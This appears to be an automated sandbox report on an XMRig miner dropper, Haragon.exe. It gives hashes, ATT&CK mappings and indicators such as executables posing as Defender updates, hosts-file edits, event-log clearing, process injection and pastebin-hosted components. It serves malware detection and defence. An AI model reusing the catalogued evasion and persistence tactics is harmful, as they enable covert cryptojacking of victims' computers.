xmrig | 105bb07ccd7dad7b0e395a08372ce5467161ce13def69c248a4f9c164c624113

Analysis

max time kernel
150s
max time network
142s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28/12/2024, 05:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Haragon.exe
Size

7.1MB
MD5

d46351b9dd2d7343ac26100277d39ab5
SHA1

337a5afd39cdd91c4816df3245ce7639b290913b
SHA256

105bb07ccd7dad7b0e395a08372ce5467161ce13def69c248a4f9c164c624113
SHA512

be3ac74e908f15bb0dea907cf620325372e3075ab9b7cdce653f95404348302bbc61bcc926fdd53b83c4d72136ba5dea12444cd19fc0d37e8bd9d3e90173efc2
SSDEEP

196608:C9uMRRdKGI3F4nqzM7fzP2lWnVP6gskRLJxVNG9mnl4cG/U/e:UuUPkFRM3P2lWVPNL+9m+O/

Score

10^/10

xmrig defense_evasion evasion execution miner persistence pyinstaller upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3168 created 624	3168	powershell.EXE	5
PID 3212 created 624	3212	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral1/memory/3696-109-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-112-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-115-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-116-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-113-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-114-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/3696-110-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3168	powershell.EXE
3212	powershell.EXE
4452	powershell.exe
936	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	RavenZephyrv2.exe
File created	C:\Windows\system32\drivers\etc\hosts	Defenderupdates.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2062871678-1047416116-518495306-1000\Control Panel\International\Geo\Nation	Haragon.exe

Executes dropped EXE 3 IoCs

pid	Process
1712	REAL XEON.exe
4044	RavenZephyrv2.exe
2380	Defenderupdates.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	pastebin.com
23	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2788	powercfg.exe
4804	powercfg.exe
4836	powercfg.exe
1540	powercfg.exe
3060	powercfg.exe
2456	powercfg.exe
1880	powercfg.exe
4988	powercfg.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	RavenZephyrv2.exe
File opened for modification	C:\Windows\system32\MRT.exe	Defenderupdates.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4044 set thread context of 2928	4044	RavenZephyrv2.exe	100
PID 2380 set thread context of 3600	2380	Defenderupdates.exe	127
PID 2380 set thread context of 4388	2380	Defenderupdates.exe	128
PID 2380 set thread context of 3696	2380	Defenderupdates.exe	132
PID 3168 set thread context of 1120	3168	powershell.EXE	135
PID 3212 set thread context of 640	3212	powershell.EXE	136

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3696-109-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-108-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-107-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-103-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-106-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-104-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-112-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-115-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-116-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-113-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-114-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/3696-110-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2252	sc.exe
2872	sc.exe
820	sc.exe
220	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x002900000004610b-6.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 28 Dec 2024 05:51:00 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735365059"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4044	RavenZephyrv2.exe
4452	powershell.exe
4452	powershell.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
4044	RavenZephyrv2.exe
2380	Defenderupdates.exe
3168	powershell.EXE
3168	powershell.EXE
936	powershell.exe
936	powershell.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
2380	Defenderupdates.exe
3168	powershell.EXE
1120	dllhost.exe
1120	dllhost.exe
3212	powershell.EXE
3212	powershell.EXE
1120	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
1120	dllhost.exe
3212	powershell.EXE
1120	dllhost.exe
1120	dllhost.exe
3212	powershell.EXE
1120	dllhost.exe
1120	dllhost.exe
3212	powershell.EXE
3212	powershell.EXE
3212	powershell.EXE
3212	powershell.EXE
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe
640	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3656	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4452	powershell.exe
Token: SeSecurityPrivilege	4452	powershell.exe
Token: SeTakeOwnershipPrivilege	4452	powershell.exe
Token: SeLoadDriverPrivilege	4452	powershell.exe
Token: SeSystemProfilePrivilege	4452	powershell.exe
Token: SeSystemtimePrivilege	4452	powershell.exe
Token: SeProfSingleProcessPrivilege	4452	powershell.exe
Token: SeIncBasePriorityPrivilege	4452	powershell.exe
Token: SeCreatePagefilePrivilege	4452	powershell.exe
Token: SeBackupPrivilege	4452	powershell.exe
Token: SeRestorePrivilege	4452	powershell.exe
Token: SeShutdownPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeSystemEnvironmentPrivilege	4452	powershell.exe
Token: SeRemoteShutdownPrivilege	4452	powershell.exe
Token: SeUndockPrivilege	4452	powershell.exe
Token: SeManageVolumePrivilege	4452	powershell.exe
Token: 33	4452	powershell.exe
Token: 34	4452	powershell.exe
Token: 35	4452	powershell.exe
Token: 36	4452	powershell.exe
Token: SeShutdownPrivilege	4988	powercfg.exe
Token: SeCreatePagefilePrivilege	4988	powercfg.exe
Token: SeShutdownPrivilege	2788	powercfg.exe
Token: SeCreatePagefilePrivilege	2788	powercfg.exe
Token: SeShutdownPrivilege	2456	powercfg.exe
Token: SeCreatePagefilePrivilege	2456	powercfg.exe
Token: SeShutdownPrivilege	1880	powercfg.exe
Token: SeCreatePagefilePrivilege	1880	powercfg.exe
Token: SeDebugPrivilege	3168	powershell.EXE
Token: SeDebugPrivilege	936	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	936	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	powershell.exe
Token: SeSecurityPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	936	powershell.exe
Token: SeLoadDriverPrivilege	936	powershell.exe
Token: SeSystemtimePrivilege	936	powershell.exe
Token: SeBackupPrivilege	936	powershell.exe
Token: SeRestorePrivilege	936	powershell.exe
Token: SeShutdownPrivilege	936	powershell.exe
Token: SeSystemEnvironmentPrivilege	936	powershell.exe
Token: SeUndockPrivilege	936	powershell.exe
Token: SeManageVolumePrivilege	936	powershell.exe
Token: SeLockMemoryPrivilege	3696	dialer.exe
Token: SeShutdownPrivilege	1540	powercfg.exe
Token: SeCreatePagefilePrivilege	1540	powercfg.exe
Token: SeShutdownPrivilege	3060	powercfg.exe
Token: SeCreatePagefilePrivilege	3060	powercfg.exe
Token: SeShutdownPrivilege	4836	powercfg.exe
Token: SeCreatePagefilePrivilege	4836	powercfg.exe
Token: SeShutdownPrivilege	4804	powercfg.exe
Token: SeCreatePagefilePrivilege	4804	powercfg.exe
Token: SeDebugPrivilege	3168	powershell.EXE
Token: SeDebugPrivilege	1120	dllhost.exe
Token: SeDebugPrivilege	3212	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	1156	svchost.exe
Token: SeIncreaseQuotaPrivilege	1156	svchost.exe
Token: SeSecurityPrivilege	1156	svchost.exe
Token: SeTakeOwnershipPrivilege	1156	svchost.exe
Token: SeLoadDriverPrivilege	1156	svchost.exe
Token: SeSystemtimePrivilege	1156	svchost.exe
Token: SeBackupPrivilege	1156	svchost.exe
Token: SeRestorePrivilege	1156	svchost.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
3656	Explorer.EXE
3656	Explorer.EXE
3656	Explorer.EXE
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
3656	Explorer.EXE
3656	Explorer.EXE
3656	Explorer.EXE

Suspicious use of SendNotifyMessage 35 IoCs

pid	Process
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
1056	taskmgr.exe
3656	Explorer.EXE
3656	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1524 wrote to memory of 1712	1524	Haragon.exe	81
PID 1524 wrote to memory of 1712	1524	Haragon.exe	81
PID 1524 wrote to memory of 4044	1524	Haragon.exe	82
PID 1524 wrote to memory of 4044	1524	Haragon.exe	82
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 4044 wrote to memory of 2928	4044	RavenZephyrv2.exe	100
PID 1728 wrote to memory of 1592	1728	cmd.exe	108
PID 1728 wrote to memory of 1592	1728	cmd.exe	108
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 3600	2380	Defenderupdates.exe	127
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2820 wrote to memory of 732	2820	cmd.exe	129
PID 2820 wrote to memory of 732	2820	cmd.exe	129
PID 2380 wrote to memory of 4388	2380	Defenderupdates.exe	128
PID 2380 wrote to memory of 3696	2380	Defenderupdates.exe	132
PID 2380 wrote to memory of 3696	2380	Defenderupdates.exe	132
PID 2380 wrote to memory of 3696	2380	Defenderupdates.exe	132
PID 2380 wrote to memory of 3696	2380	Defenderupdates.exe	132
PID 2380 wrote to memory of 3696	2380	Defenderupdates.exe	132
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 3168 wrote to memory of 1120	3168	powershell.EXE	135
PID 1120 wrote to memory of 624	1120	dllhost.exe	5
PID 1120 wrote to memory of 676	1120	dllhost.exe	7
PID 1120 wrote to memory of 972	1120	dllhost.exe	12
PID 1120 wrote to memory of 412	1120	dllhost.exe	13
PID 1120 wrote to memory of 436	1120	dllhost.exe	14
PID 1120 wrote to memory of 884	1120	dllhost.exe	15
PID 1120 wrote to memory of 940	1120	dllhost.exe	16
PID 1120 wrote to memory of 1044	1120	dllhost.exe	17
PID 1120 wrote to memory of 1104	1120	dllhost.exe	18
PID 1120 wrote to memory of 1144	1120	dllhost.exe	19
PID 1120 wrote to memory of 1260	1120	dllhost.exe	21
PID 1120 wrote to memory of 1348	1120	dllhost.exe	22
PID 1120 wrote to memory of 1356	1120	dllhost.exe	23
PID 1120 wrote to memory of 1392	1120	dllhost.exe	24
PID 1120 wrote to memory of 1440	1120	dllhost.exe	25
PID 1120 wrote to memory of 1544	1120	dllhost.exe	26
PID 1120 wrote to memory of 1568	1120	dllhost.exe	27
PID 1120 wrote to memory of 1628	1120	dllhost.exe	28
PID 1120 wrote to memory of 1640	1120	dllhost.exe	29
PID 1120 wrote to memory of 1752	1120	dllhost.exe	30
PID 1120 wrote to memory of 1788	1120	dllhost.exe	31
PID 1120 wrote to memory of 1864	1120	dllhost.exe	32

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1044
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a131b460-eba4-42e7-81de-4a54f4a9d497}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1120
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7195159f-dc12-43d3-bb46-e096dee968a5}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:640

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:972

